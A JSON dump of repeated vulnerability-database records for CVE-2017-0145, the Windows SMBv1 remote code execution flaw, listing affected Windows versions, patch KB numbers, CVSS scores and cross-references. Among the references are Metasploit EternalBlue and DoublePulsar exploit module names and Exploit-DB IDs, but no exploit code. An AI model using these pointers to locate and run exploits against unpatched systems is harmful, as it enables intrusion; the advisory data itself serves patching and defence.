for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T12:46:46", "differentElements": ["msAffectedSoftware"], "edition": 72}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-20T14:58:45", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-20T14:58:45", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-20T14:58:45", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012214", "KB4012606", "KB4012213", "KB4013198", "KB3210721", "KB4012216", "KB3177186", "KB3205409", "KB3205401", "KB4014077", "KB4012212", "KB4013429", "KB4012598", "KB3213986", "KB3212646", "KB4012217", "KBMS16-110, 3187754", "KB3210720", "KB4012215"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T14:58:45", "differentElements": ["msAffectedSoftware"], "edition": 73}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-21T08:57:08", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": 